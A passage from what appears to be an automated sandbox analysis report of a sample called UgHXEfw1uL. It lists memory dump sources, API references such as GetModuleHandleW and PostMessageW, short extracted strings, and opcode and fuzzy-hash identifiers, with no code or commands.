                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B446
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 73c6e0f022fad06d64682f4ff76dff3fc026a68aff6985f124515f126f626ee5
                                          • Instruction ID: 30bcb191ded54d00800767d1dee6d02f45568a0506b5fcfeb06d0bcdbc7af584
                                          • Opcode Fuzzy Hash: 73c6e0f022fad06d64682f4ff76dff3fc026a68aff6985f124515f126f626ee5
                                          • Instruction Fuzzy Hash: 4F1113B6C002498FCB20CF9AD444ADEFBF4EF88324F14841AD528B7201D375A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0767C65D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 9b80521533b85afc1f0d2363587e636d9817e092fe3d31cad9a06c4e684697c8
                                          • Instruction ID: 95cbab6bbfec7b1c2a3a2b47e6e966f436ddc60e815eddefb985621cb6a6fe7f
                                          • Opcode Fuzzy Hash: 9b80521533b85afc1f0d2363587e636d9817e092fe3d31cad9a06c4e684697c8
                                          • Instruction Fuzzy Hash: BA1106B5800349DFDB20DF9AD984BDEBBF8EB48310F10845AE519B7201C375A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0767C65D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: e7e86871592b0fbd9295a5cdeffc5d52d6e1c34ebff8e6952c635ed74a4580c3
                                          • Instruction ID: 0dcd4857aa536bf10a66ecb82db7f2888e429e9b86397a6a545ca3512e4f0ebe
                                          • Opcode Fuzzy Hash: e7e86871592b0fbd9295a5cdeffc5d52d6e1c34ebff8e6952c635ed74a4580c3
                                          • Instruction Fuzzy Hash: 2E1125B58003499FCB20CF9AD984BDEBFF8EB48310F10841AD518A7201C374A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (gq
                                          • API String ID: 0-1972435379
                                          • Opcode ID: f2b73ba8134df8c2fa56c1ba08db78b2fc2f9a290052a0a54901af13fe490c61
                                          • Instruction ID: ab0d8104bac9d1ea30882cdf049a0e2f2b70d77d66cdc8e99cf73cf9d5f3a281
                                          • Opcode Fuzzy Hash: f2b73ba8134df8c2fa56c1ba08db78b2fc2f9a290052a0a54901af13fe490c61
                                          • Instruction Fuzzy Hash: 5B81DF75A01208DFDB14DFA9E848AAEFFF6FF84310F11846AE445A7790DB309845CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hgq
                                          • API String ID: 0-2103768809
                                          • Opcode ID: 7168027f80edcf02f590dfdc5b878ef752fd27912cf965a143371708df5a5e46
                                          • Instruction ID: 3e164028f04329daf852c9debb80f428fcb1dd523fde9b24a9a4d06512e70acd
                                          • Opcode Fuzzy Hash: 7168027f80edcf02f590dfdc5b878ef752fd27912cf965a143371708df5a5e46
                                          • Instruction Fuzzy Hash: 8F418EB5A003089FCB14DFA9C449AAEBBF9FF88310F50842DE449E7751CB35A941CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hgq
                                          • API String ID: 0-2103768809
                                          • Opcode ID: 50c5c45605d65a43e89f6a47e3154f5dba0a5a4a9936aaaf66409478c7cb0dd2
                                          • Instruction ID: 609f0b9dd6ebd48007dc5fe922a5b0ccca36677a434009d8b8cc48169c7e285b
                                          • Opcode Fuzzy Hash: 50c5c45605d65a43e89f6a47e3154f5dba0a5a4a9936aaaf66409478c7cb0dd2
                                          • Instruction Fuzzy Hash: 1F41D3B5A003489FCB10CFA9C845AAEBBF5EF88310F04846EE449E7351D734A945CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5 1l
                                          • API String ID: 0-1554365358
                                          • Opcode ID: 92c74300d92eae70371cfb3c07d94226e539cd0d2cbf69e17060edda98f55675
                                          • Instruction ID: 3e86faf3502da64f84c726bfe272bc44245973902aa81f88b00f75e96162030d
                                          • Opcode Fuzzy Hash: 92c74300d92eae70371cfb3c07d94226e539cd0d2cbf69e17060edda98f55675
                                          • Instruction Fuzzy Hash: E551F574E112188FDB14CFA9D896B9DFBB2FB88310F1094AAE44AB7354DA305E81CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ~552
                                          • API String ID: 0-3806510334
                                          • Opcode ID: edd5a0c3bde3047e6c9270254d74694fe3d40af96cb54f9e7a726187e3878373
                                          • Instruction ID: d39fd94c1d7c7477e695ef2aa3a55f8ed8151223292c2c8209813e6a9d980a16
                                          • Opcode Fuzzy Hash: edd5a0c3bde3047e6c9270254d74694fe3d40af96cb54f9e7a726187e3878373
                                          • Instruction Fuzzy Hash: C7315BB6E14204ABD745DFA0DD8F69EBF7ADB80291F64F1EA91C1D7250E5318904CF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4j
                                          • API String ID: 0-3078020137
                                          • Opcode ID: a4f5b7baf7edc952cd33d3dd14ca7cb67df4009531cda2bb60917890b290dc1f
                                          • Instruction ID: 1924e14de4c1e68c9981610d0b82d863c80fed474b2bc86fdb6bc33f13253888
                                          • Opcode Fuzzy Hash: a4f5b7baf7edc952cd33d3dd14ca7cb67df4009531cda2bb60917890b290dc1f
                                          • Instruction Fuzzy Hash: 6C2108A281E3548FE741EFB8C8563D97F71DF81214F5498E7D4C4C7256EA308948C695
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: B
                                          • API String ID: 0-1255198513
                                          • Opcode ID: 57c217f4cda24aa97eb781450391aa2bc50477e2fcba775baa157f743a1d3ab4
                                          • Instruction ID: 3b82c9ea5f2820d32fd4816acff936e496221ad3dbc23496021e6490c548790c
                                          • Opcode Fuzzy Hash: 57c217f4cda24aa97eb781450391aa2bc50477e2fcba775baa157f743a1d3ab4
                                          • Instruction Fuzzy Hash: 753106B4E052099FCB44CFA9C481AAEBBF2FF88300F50946AD819E7315E7749A41CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: B
                                          • API String ID: 0-1255198513
                                          • Opcode ID: 99ff4d685979cd8c793c6857d0d84b0fbe3cf7e942ec78b68c6498dd845f3a0b
                                          • Instruction ID: 8403ea2e00e4176c7f36c81e03e5432a466965edaeb5fc54838be17a2c93ebc6
                                          • Opcode Fuzzy Hash: 99ff4d685979cd8c793c6857d0d84b0fbe3cf7e942ec78b68c6498dd845f3a0b
                                          • Instruction Fuzzy Hash: 4131E2B4E0520A9FCB44CFAAC4819AEBBF2FF89300F10946AD819E7315E7749A41CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: m6
                                          • API String ID: 0-2040306782
                                          • Opcode ID: b0341c77482892ed6e3a38667708c6c0a477791644fa740c531d3a79ab1accb2
                                          • Instruction ID: cd22b534381f19ea92b656f677a56e9663b8ac545c59b7fd813c761a050378f2
                                          • Opcode Fuzzy Hash: b0341c77482892ed6e3a38667708c6c0a477791644fa740c531d3a79ab1accb2
                                          • Instruction Fuzzy Hash: CD2126B4E04209EFDB44DFAAD5462AEFBF6EB88304F24D4AAD515E3354E6305A01CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: m6
                                          • API String ID: 0-2040306782
                                          • Opcode ID: d557b1f11a509a518bf5bd9dd2746c0f4ac238cd489e4266a3529ef1561c7bc3
                                          • Instruction ID: 071c1bb27adc870c560aaad7db36f76e59762e5a26bdfff9fd8be0c837648643
                                          • Opcode Fuzzy Hash: d557b1f11a509a518bf5bd9dd2746c0f4ac238cd489e4266a3529ef1561c7bc3
                                          • Instruction Fuzzy Hash: D22116B4E04209DFDB44DFAAD5455AEFBF6FB88300F20D4AAD519A3354EA305A01CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ~552
                                          • API String ID: 0-3806510334
                                          • Opcode ID: 7282758930d32927840676e9f7fb579bfa9d4993599a5a3e3a101cf966b6eedd
                                          • Instruction ID: 7006841c69e29e9fb92bdf307a579d1fd9d1b316a09d3cfe6d5c8d55a7e61d3c
                                          • Opcode Fuzzy Hash: 7282758930d32927840676e9f7fb579bfa9d4993599a5a3e3a101cf966b6eedd
                                          • Instruction Fuzzy Hash: 4611A074E01308EBD748CFA5D9459AEFBB6FF89200F20E4A6D44AA7214EB309A40CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4j
                                          • API String ID: 0-3078020137
                                          • Opcode ID: 8b20fb31581b43f78a28464c7506ebb07342ab531c6cbc6061c38c2a657feab8
                                          • Instruction ID: 1f09c00ecde39c62584e07b081a9fd90215afa10871ddf74820b77f9733e9939
                                          • Opcode Fuzzy Hash: 8b20fb31581b43f78a28464c7506ebb07342ab531c6cbc6061c38c2a657feab8
                                          • Instruction Fuzzy Hash: EEF0AF70A1A308DFD704DFB8D54A19DBFB2AB88201F10E466F44993204EB309E04CA01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d53a1ab3ecff6222d9881d66372643014ebf3e9411ab14cef6a3028dee6cbf61
                                          • Instruction ID: 2713279672e48bb77b6e666f346fd3ddf824c69439f412ed4af7f5b014fde415
                                          • Opcode Fuzzy Hash: d53a1ab3ecff6222d9881d66372643014ebf3e9411ab14cef6a3028dee6cbf61
                                          • Instruction Fuzzy Hash: E962FFB0E00B455AEB709F74844D7AEBAA1FB46304F20691FC1FACB7A0DB359881CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c0bad3823b8675a1bc18e536a7ccfb369f5866649c5184de53417b6be3a2dcf
                                          • Instruction ID: 7c1e18727b85318f6c21e3f6c0d9d3dbe1b138c363f974d4fd8f7c01b9b484b6
                                          • Opcode Fuzzy Hash: 7c0bad3823b8675a1bc18e536a7ccfb369f5866649c5184de53417b6be3a2dcf
                                          • Instruction Fuzzy Hash: 3C1238B0E05B429AE7745F74858D39EB690FB06318F30591FC0FA8B365D7369486CB8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b5dca5d49f099c3ab49423bfa7d775ca53037db51ce50813513533c8295c48ec
                                          • Instruction ID: cd96c13aaee55247c268c8fadf101ca31d3f9d63b330608ac3608e824be0fcb4
                                          • Opcode Fuzzy Hash: b5dca5d49f099c3ab49423bfa7d775ca53037db51ce50813513533c8295c48ec
                                          • Instruction Fuzzy Hash: 6F51D030A00306CFCB15EFA8D4996BEBBB2EF85300F149529E586E7351DF349A46CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66d4464565b50af0a9c744d3afd50aa214aa29459de3588990820234e7fb0b38
                                          • Instruction ID: 9154953f5cc1fd6863149e85cb38e6a46c48ed6559243facee25e0afc7806c42
                                          • Opcode Fuzzy Hash: 66d4464565b50af0a9c744d3afd50aa214aa29459de3588990820234e7fb0b38
                                          • Instruction Fuzzy Hash: C3719078A01208AFDB14DF59D889DAEBBB2FF48714F115098F941AB361DB31EC81CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80e939d7c91491c78a9bc933fda57df9361e343cc8052fb3ac3ff59c129162e1
                                          • Instruction ID: 339cbe91a7d9bb2533a72c8cdbb1d390c9f58ba1b31928b6aeb571018893e149
                                          • Opcode Fuzzy Hash: 80e939d7c91491c78a9bc933fda57df9361e343cc8052fb3ac3ff59c129162e1
                                          • Instruction Fuzzy Hash: 45519A707006049FDB15EF28C89ABAAB7F6EF89304F145469E48ADB3A1DB71EC41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd519af6e23c2759a5321c379ce57f7ed4cfe142e16e815177dc076cbe98805d
                                          • Instruction ID: 3acb03a0f076a004dd0024326f2e5a774aec8359207512aa7af610474b009aea
                                          • Opcode Fuzzy Hash: fd519af6e23c2759a5321c379ce57f7ed4cfe142e16e815177dc076cbe98805d
                                          • Instruction Fuzzy Hash: AC516F31900709DFCB11EF68C4459ADB7B1FF45304F259A6EE459AB262EB71EA81CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04e79e952b11ea1a63a1e749c3a32edffcd7fbe205e387ad9c5d15b7c1788639
                                          • Instruction ID: 5468dda2532c593f90b76c6a2c03ee65595ee5f3c70a864a20a82887f02dec37
                                          • Opcode Fuzzy Hash: 04e79e952b11ea1a63a1e749c3a32edffcd7fbe205e387ad9c5d15b7c1788639
                                          • Instruction Fuzzy Hash: B9514F31900B09DFCB11EFB8C85599DB7B1FF85310F218A6DE5556B262EB70AA85CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4157acbd6b4f1e24b87c1e761f2a148639bda1f43617ae4eb7ff78199c7709b2
                                          • Instruction ID: e6e27d61cb5cd597e389a1d00c6d26ed0c3a789702665cc15369ba7064e9c269
                                          • Opcode Fuzzy Hash: 4157acbd6b4f1e24b87c1e761f2a148639bda1f43617ae4eb7ff78199c7709b2
                                          • Instruction Fuzzy Hash: 79517231900B09DFDB11EFB8C4459ADB7B1FF85300F218A6DE5456B222EB70A985CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc77af96395ae05a706a1e7e0dfc0526aa80ae65a577ae48e88d0e2e70d1358e
                                          • Instruction ID: 51ac0862412d574c2ba423031c33e45550047a166f131c828c8a2723b00a5d5e
                                          • Opcode Fuzzy Hash: cc77af96395ae05a706a1e7e0dfc0526aa80ae65a577ae48e88d0e2e70d1358e
                                          • Instruction Fuzzy Hash: 94419D70B002049FDB15DF68C989BADBBF6EF89304F145469E48A9B7A1DB71EC41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f32e0c6094aa5649e6e728e55ecf1eff03c1f698b79c5e4a6bb3271f8e4096c
                                          • Instruction ID: a4b85530c0108b2000203c28980332f335799a487b10032e6cf007b7adec0bf9
                                          • Opcode Fuzzy Hash: 6f32e0c6094aa5649e6e728e55ecf1eff03c1f698b79c5e4a6bb3271f8e4096c
                                          • Instruction Fuzzy Hash: 5651A378601204AFDB54DF68D899DAD7BB2FF49724B154098FA42AB371DB31EC81CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2070893244.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dad000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b26fef36472c2967e2b8a4bc3c3b4aba6cd3ab47b4b43cfa2df0f7583fa84084
                                          • Instruction ID: 445fe126bb28a7fc211c6e12f9b0c07421eb5c90823efeda5f913c180a2054c1
                                          • Opcode Fuzzy Hash: b26fef36472c2967e2b8a4bc3c3b4aba6cd3ab47b4b43cfa2df0f7583fa84084
                                          • Instruction Fuzzy Hash: 5F214575504204DFCB05DF14D9C0B26BF66FB99324F288568E80B0B65AC336D806CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a606d18def0376668d690b85930aedbcacefd4358d4eb259b4e24c93e12894c6
                                          • Instruction ID: 7d749c4789538c16266627569e05b182b19ce3df7e99145fc8067011ef1a0ecb
                                          • Opcode Fuzzy Hash: a606d18def0376668d690b85930aedbcacefd4358d4eb259b4e24c93e12894c6
                                          • Instruction Fuzzy Hash: 0A311AB0E042099FDB04CFAAC485AAEFBF2BB88300F14D5A59414E7315E7749A00CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2070933974.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dbd000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bce21c733683b65146893dcd1a698f6fe610cd4a098e31efb26a61ac273ecbc4
                                          • Instruction ID: 18fbb338166ad31dce3f05767ae59d3a1a94d9dbb6da0567eb15dd6edd084f58
                                          • Opcode Fuzzy Hash: bce21c733683b65146893dcd1a698f6fe610cd4a098e31efb26a61ac273ecbc4
                                          • Instruction Fuzzy Hash: 17210475504340DFCB05DF54C9C0B6ABB66FB84324F24C96DE84A4B246D33AD806CB75
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2070933974.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dbd000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb56d7abc1a669ba91cb78e18a1e055de1646f7504783d03ad4a8e949be53d8e
                                          • Instruction ID: 8843d8305a7cb7b14440705fa1b823bd8408323a3e77ea78e3280c6c97d7e77c
                                          • Opcode Fuzzy Hash: fb56d7abc1a669ba91cb78e18a1e055de1646f7504783d03ad4a8e949be53d8e
                                          • Instruction Fuzzy Hash: EA210475504204DFCB05CF14D9C0B66BBA6FB84324F24C96DD84A4B356D33AE806CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8925e8e71ce208c66ca148ea8d79e9d45f522724f3ecaa007a7afd81f7d6429
                                          • Instruction ID: f35351976de7838cfff97622862d503fdcbade69bfe7707c242983a536f38a5a
                                          • Opcode Fuzzy Hash: f8925e8e71ce208c66ca148ea8d79e9d45f522724f3ecaa007a7afd81f7d6429
                                          • Instruction Fuzzy Hash: 832179797002209FDB209E19D489E6AB3AAFB88724F00942EFA8697711CB71E841CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 969396382b89aeaacf40999d342af4c029c90a27e97f839587d0deeb086df433
                                          • Instruction ID: a264f93e1d7e7204714389d22633231d054f424288f7645bfc9ec296ba8ccbe9
                                          • Opcode Fuzzy Hash: 969396382b89aeaacf40999d342af4c029c90a27e97f839587d0deeb086df433
                                          • Instruction Fuzzy Hash: BD21F7B0E042099FDB04CFAAC585AAEFBF2BB89300F10D5A69459E7315E7709A40CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7f4335b540a11de967cf7a87c8d3aacf45c84c2e6be7841142b6877150d487a
                                          • Instruction ID: 6c2f58ca017db52cc56854e8e55951ca613b1de7672197a342e4de5dd7968cf5
                                          • Opcode Fuzzy Hash: f7f4335b540a11de967cf7a87c8d3aacf45c84c2e6be7841142b6877150d487a
                                          • Instruction Fuzzy Hash: 282148B0E11209DFCB48CFA9C4866AEBBF2FB88300F148569D41AE3350D7749A41CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bd08671e657f209cc51c5ebbcec4b2087858eafb976a8f3365beeb87d4a6d56
                                          • Instruction ID: e617a61704525ef1c2fbd9b81b78308e22c986515672f5cfa4af32f5a40c47a3
                                          • Opcode Fuzzy Hash: 9bd08671e657f209cc51c5ebbcec4b2087858eafb976a8f3365beeb87d4a6d56
                                          • Instruction Fuzzy Hash: 30213C70E05209EFDB44CFAAD5455AEFBF6AF88304F10D56A948AE7214E7309B40CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
